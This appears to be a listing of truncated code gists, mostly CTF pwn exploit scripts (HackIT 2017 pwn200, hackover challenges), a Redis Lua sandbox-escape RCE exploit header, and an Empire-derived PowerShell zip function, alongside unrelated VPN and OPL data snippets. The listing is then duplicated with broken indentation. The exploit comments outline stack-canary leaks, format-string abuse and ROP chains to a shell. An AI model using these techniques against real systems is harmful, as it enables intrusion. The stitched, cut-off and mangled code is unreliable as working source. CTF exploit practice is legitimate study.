c3c

## dotnet-identity-hash.py
from base64 import b64decode,b64encode
from struct import pack,unpack
from binascii import hexlify
import sys

def u32(x): return unpack(">I", x)[0]
def p32(x): return pack(">I", x)

hash = b64decode(sys.argv[1]).replace(b"-",b"")

## Invoke-ZipFolder.ps1
# Invoke-ZipFolder from https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/zipfolder.py
# also works on older PowerShell versions, worrying though that it displays a dialog, see https://github.com/EmpireProject/Empire/issues/135

function Invoke-ZipFolder
{
    param([string]$Folder, [string]$ZipFileName)
    if (-not (Test-Path $Folder)) {
        "Target folder $Folder doesn't exist."
        return
    }

## hackitctf2017-pwn200.py
# solution for HackIT CTF 2017 pwn200 challenge
# my first ARM exploit :0
# binary is NX + ASLR enabled on the server
# there's a format string vulnerability as well as a buffer overflow
# we can obtain the stack canary through the format string, then perform the overflow.
# since NX is enabled, we have to ROP our way to a shell
# - c3c

from pwn import *
context.arch = 'arm'

## redis-lua-linux-x86-poc.py
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c

## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version

## rollthedice.py
from pwn import *
from Crypto.Cipher import AES

r = remote("challenges.hackover.h4q.it", 1415)

def decr(key, roll):
	return u16(AES.new(key).decrypt(roll)[:2], endian="big")

for i in range(32):
	r.recvuntil("My dice roll: ")

## ping_gnop.py
from pwn import *

# the binary reverses our payload and checks for a number of bad bytes
# generated a ropchain and modified it to work

def ropchain():
	# modified ropchain generated with ropper
	# ropper's badbytes option didnt work correctly...

	from struct import pack

## bookshellf.py
from pwn import *

context.os = 'linux'
context.arch = "amd64"

#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)

# using the book 'seek' function we can read past the array boundary and leak memory
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)

## SimpleHTTPServerWithUpload.py
#!/usr/bin/env python

"""Simple HTTP Server With Upload.

This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.

"""


## start-jnpr-vpn.sh
#!/bin/sh
##
## netscreen/jnpr ssl vpn connection magic
## oogali@idlepattern.com / @oogali
##
## i wrote this about a year ago (2009), when i had continuous access
## to a jnpr ssl vpn box and had to connect via it.
##
## if bits of this script are broken, i'll be glad to fix if someone
## gives me client access to a ssl vpn box to test against.

## camions.dat
/*********************************************
 * OPL 12.5 Data
 * Author: crash
 * Creation Date: Mar 6, 2013 at 3:38:56 PM
 *********************************************/

// 17 nodes, first node is depot.
// <Name, NodeType {collab|client}, WGS84-Lat, WGS84-Lon, Lam93-X, Lam93-Y, TimeWin-Min, TimeWin-Max>
AllNodes = {
<"Poitiers"     		1,46.589069,0.340576,496421,6613320,360,1200>, // 0
	from base64 import b64decode,b64encode
	from struct import pack,unpack
	from binascii import hexlify
	import sys

	def u32(x): return unpack(">I", x)[0]
	def p32(x): return pack(">I", x)

	hash = b64decode(sys.argv[1]).replace(b"-",b"")
	# Invoke-ZipFolder from https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/zipfolder.py
	# also works on older PowerShell versions, worrying though that it displays a dialog, see https://github.com/EmpireProject/Empire/issues/135

	function Invoke-ZipFolder
	{
	param([string]$Folder, [string]$ZipFileName)
	if (-not (Test-Path $Folder)) {
	"Target folder $Folder doesn't exist."
	return
	}
	# solution for HackIT CTF 2017 pwn200 challenge
	# my first ARM exploit :0
	# binary is NX + ASLR enabled on the server
	# there's a format string vulnerability as well as a buffer overflow
	# we can obtain the stack canary through the format string, then perform the overflow.
	# since NX is enabled, we have to ROP our way to a shell
	# - c3c

	from pwn import *
	context.arch = 'arm'
	## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
	## Original exploit by corsix and sghctoma
	## Author: @c3c

	## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
	## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
	## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
	## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
	## This code is much the same, except the process is done using pwntools' DynELF
	## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
	from pwn import *
	from Crypto.Cipher import AES

	r = remote("challenges.hackover.h4q.it", 1415)

	def decr(key, roll):
	return u16(AES.new(key).decrypt(roll)[:2], endian="big")

	for i in range(32):
	r.recvuntil("My dice roll: ")
	from pwn import *

	# the binary reverses our payload and checks for a number of bad bytes
	# generated a ropchain and modified it to work

	def ropchain():
	# modified ropchain generated with ropper
	# ropper's badbytes option didnt work correctly...

	from struct import pack
	from pwn import *

	context.os = 'linux'
	context.arch = "amd64"

	#r = process("./bookshellf")
	r = remote("challenges.hackover.h4q.it", 31337)

	# using the book 'seek' function we can read past the array boundary and leak memory
	# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)
	#!/usr/bin/env python

	"""Simple HTTP Server With Upload.

	This module builds on BaseHTTPServer by implementing the standard GET
	and HEAD requests in a fairly straightforward manner.

	"""
	#!/bin/sh
	##
	## netscreen/jnpr ssl vpn connection magic
	## oogali@idlepattern.com / @oogali
	##
	## i wrote this about a year ago (2009), when i had continuous access
	## to a jnpr ssl vpn box and had to connect via it.
	##
	## if bits of this script are broken, i'll be glad to fix if someone
	## gives me client access to a ssl vpn box to test against.
	/*********************************************
	* OPL 12.5 Data
	* Author: crash
	* Creation Date: Mar 6, 2013 at 3:38:56 PM
	*********************************************/

	// 17 nodes, first node is depot.
	// <Name, NodeType {collab\|client}, WGS84-Lat, WGS84-Lon, Lam93-X, Lam93-Y, TimeWin-Min, TimeWin-Max>
	AllNodes = {
	<"Poitiers" 1,46.589069,0.340576,496421,6613320,360,1200>, // 0